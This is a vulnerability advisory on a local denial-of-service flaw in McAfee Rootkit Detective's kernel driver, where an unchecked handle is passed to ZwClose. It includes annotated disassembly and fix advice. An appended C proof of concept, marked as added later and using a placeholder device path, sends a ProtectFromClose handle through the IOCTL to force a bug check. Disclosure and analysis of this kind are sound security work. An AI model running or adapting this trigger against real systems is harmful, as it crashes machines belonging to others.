Advisory NTIADV0804 (Accelerated Disclosure)
McAfee Rootkit Detective (Rootkit_Detective.sys) Denial of Service Vulnerability
Vendor: McAfee, Inc.
Affected Software: McAfee Rootkit Detective <= 1.1
Affected Driver: Rootkit_Detective.sys
Date Reported: 2008-09-18
Release Date: 2008-10-18
Status: Not fixed
Exploit: Rootkit_Deactive_DoS.zip - Local Denial of Service Exploit - ZwClose
Disclosure Timeline:
2008-09-18 - Vulnerability reported to vendor
2008-10-03 - Vendor notified a second time
2008-10-18 - Full technical details released to general public
Description
The kernel driver Rootkit_Detective.sys shipped with McAfee Rootkit Detective contains a vulnerability in the code that handles IOCTL 0x2A7B8040 requests. Once loaded, the vulnerable kernel module is accessible to all users and remains loaded until the system is rebooted.
Details
An attacker can close any handle by sending a specially crafted IRP to the IOCTL handler. The driver does not validate the user-supplied parameter passed with IOCTL 0x2A7B8040 and hands it directly to ZwClose. As the listings below show, the handler only checks that the input buffer is at least four bytes long and that SystemBuffer passes MmIsAddressValid (a redundant check: for a METHOD_BUFFERED request SystemBuffer is kernel memory allocated by the I/O manager), and the CloseHandle wrapper rejects nothing but INVALID_HANDLE_VALUE (0xFFFFFFFF). If the caller passes a handle on which it has set the ProtectFromClose flag (HANDLE_FLAG_PROTECT_FROM_CLOSE via SetHandleInformation), ZwClose, which runs with a previous mode of KernelMode, bug checks the system with INVALID_KERNEL_HANDLE (0x93). Any local user who can open the device can therefore crash the machine. A driver that must close a handle on behalf of a user-mode caller should use ObCloseHandle with the caller's previous mode (UserMode), so that the Object Manager treats the value as an untrusted user handle instead of bug checking, or, better, not expose the operation through an IOCTL at all.

.text:00019137 @@ioctl_close_handle:
.text:00019137                 push    4
.text:00019139                 pop     esi
.text:0001913A                 cmp     ecx, esi                       ; InputBufferLength >= 4 ?
.text:0001913C                 jb      @@invalid_buffer_size
.text:00019142                 test    edi, edi                       ; SystemBuffer
.text:00019144                 jz      @@invalid_buffer_size
.text:0001914A                 push    edi
.text:0001914B                 call    ds:MmIsAddressValid            ; redundant for METHOD_BUFFERED
.text:00019151                 test    al, al
.text:00019153                 jz      @@return
.text:00019159                 push    dword ptr [edi]                ; SystemBuffer[0] = user-supplied HANDLE
.text:0001915B                 call    CloseHandle
...

.text:00011F98 ; int __stdcall CloseHandle(int Handle)
.text:00011F98 CloseHandle     proc near
.text:00011F98
.text:00011F98 Handle          = dword ptr  8
.text:00011F98
.text:00011F98                 mov     edi, edi
.text:00011F9A                 push    ebp
.text:00011F9B                 mov     ebp, esp
.text:00011F9D                 cmp     [ebp+Handle], 0FFFFFFFFh       ; only INVALID_HANDLE_VALUE is rejected
.text:00011FA1                 mov     eax, STATUS_INVALID_HANDLE
.text:00011FA6                 jz      short @@exit
.text:00011FA8                 push    [ebp+Handle]
.text:00011FAB                 call    ds:ZwClose                     ; no ObReferenceObjectByHandle, no previous-mode check
.text:00011FB1                 test    eax, eax
.text:00011FB3                 jl      short @@exit
.text:00011FB5                 xor     eax, eax
.text:00011FB7
.text:00011FB7 @@exit:
.text:00011FB7                 pop     ebp
.text:00011FB8                 retn    4
.text:00011FB8 CloseHandle     endp
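The following is an added example written for this edit; it is not part of the advisory and not the code in Rootkit_Deactive_DoS.zip. It decodes the IOCTL code 0x2A7B8040 into its CTL_CODE fields (which is how one confirms the request is METHOD_BUFFERED and needs FILE_WRITE_ACCESS on the device handle), builds the four-byte input buffer the handler expects, mirrors the wrapper's single INVALID_HANDLE_VALUE check, and, on Windows only, sends a ProtectFromClose handle to the driver. Everything here is an assumption except the IOCTL code and the buffer layout taken from the listings: DEVICE_PATH is a placeholder because the advisory does not name the device object, the helper names are mine, and the handle is treated as 32 bits because the listing is an x86 build.

```c
/*
 * Added example, not from the advisory or its exploit archive.
 * ASSUMPTIONS: DEVICE_PATH is a placeholder (the device name is not given
 * on the page); the input buffer is one 32-bit HANDLE, as in the x86 listing
 * (cmp ecx, 4 / push dword ptr [edi]); the trigger() part is Windows-only and,
 * if the path is right, ends in a bug check. Do not run it on a machine you
 * care about.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IOCTL_RKD_CLOSE_HANDLE 0x2A7B8040u                    /* from the advisory */
#define DEVICE_PATH "\\\\.\\ReplaceWithRootkitDetectiveDevice"  /* placeholder, assumed */

/* CTL_CODE layout: DeviceType<<16 | Access<<14 | Function<<2 | Method.
 * Method 0 is METHOD_BUFFERED: the I/O manager copies the caller's input into
 * Irp->AssociatedIrp.SystemBuffer, which is why MmIsAddressValid on that
 * pointer proves nothing about the handle value inside it. */
static uint32_t ioctl_device_type(uint32_t code) { return code >> 16; }
static uint32_t ioctl_access(uint32_t code)      { return (code >> 14) & 3u; }
static uint32_t ioctl_function(uint32_t code)    { return (code >> 2) & 0xFFFu; }
static uint32_t ioctl_method(uint32_t code)      { return code & 3u; }

/* Builds the input buffer the handler reads as SystemBuffer[0]: one
 * little-endian 32-bit handle value. Returns the byte count (4), or 0 if the
 * destination is too small. The handler itself rejects anything shorter. */
static size_t build_close_request(uint32_t handle_value, uint8_t *buf, size_t cap)
{
    if (cap < 4) return 0;
    buf[0] = (uint8_t)(handle_value);
    buf[1] = (uint8_t)(handle_value >> 8);
    buf[2] = (uint8_t)(handle_value >> 16);
    buf[3] = (uint8_t)(handle_value >> 24);
    return 4;
}

/* Mirrors the only check in the driver's CloseHandle wrapper: the value is
 * compared against INVALID_HANDLE_VALUE (-1) and nothing else, so a
 * ProtectFromClose handle or an arbitrary number goes straight to ZwClose.
 * Returns 1 if the driver would forward the value to ZwClose. */
static int driver_would_forward(uint32_t handle_value)
{
    return handle_value != 0xFFFFFFFFu;
}

#ifdef _WIN32
#include <windows.h>

/* Opens the device, creates an event whose handle is marked
 * HANDLE_FLAG_PROTECT_FROM_CLOSE, and asks the driver to close it. */
static int trigger(void)
{
    HANDLE dev = CreateFileA(DEVICE_PATH, GENERIC_READ | GENERIC_WRITE, 0, NULL,
                             OPEN_EXISTING, 0, NULL);
    if (dev == INVALID_HANDLE_VALUE) {
        printf("CreateFile(%s) failed: %lu\n", DEVICE_PATH, GetLastError());
        return 1;
    }
    HANDLE victim = CreateEventA(NULL, FALSE, FALSE, NULL);
    /* From user mode, CloseHandle on this handle fails with
     * STATUS_HANDLE_NOT_CLOSABLE; from ZwClose in kernel mode it bug checks. */
    SetHandleInformation(victim, HANDLE_FLAG_PROTECT_FROM_CLOSE,
                         HANDLE_FLAG_PROTECT_FROM_CLOSE);

    uint8_t in[4];
    size_t len = build_close_request((uint32_t)(uintptr_t)victim, in, sizeof in);
    DWORD returned = 0;
    BOOL ok = DeviceIoControl(dev, IOCTL_RKD_CLOSE_HANDLE, in, (DWORD)len,
                              NULL, 0, &returned, NULL);
    /* Only reached if the device path was wrong or the driver was patched. */
    printf("DeviceIoControl returned %d (last error %lu)\n", ok, GetLastError());
    CloseHandle(dev);
    return 0;
}
#endif

int main(void)
{
    printf("IOCTL 0x%08X: device type 0x%X, function 0x%X, method %u, access %u\n",
           (unsigned)IOCTL_RKD_CLOSE_HANDLE,
           (unsigned)ioctl_device_type(IOCTL_RKD_CLOSE_HANDLE),
           (unsigned)ioctl_function(IOCTL_RKD_CLOSE_HANDLE),
           (unsigned)ioctl_method(IOCTL_RKD_CLOSE_HANDLE),
           (unsigned)ioctl_access(IOCTL_RKD_CLOSE_HANDLE));
#ifdef _WIN32
    return trigger();
#else
    return 0;
#endif
}
```

Decoding gives device type 0x2A7B (a vendor-defined type), function 0x010, METHOD_BUFFERED and FILE_WRITE_ACCESS; the access field means the caller needs write access on the device handle, which is why the device being openable by all users matters. The decode and buffer helpers are portable so the layout can be checked anywhere; only trigger() needs Windows.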
Copyright © 2008-2009 NT Internals. All rights reserved.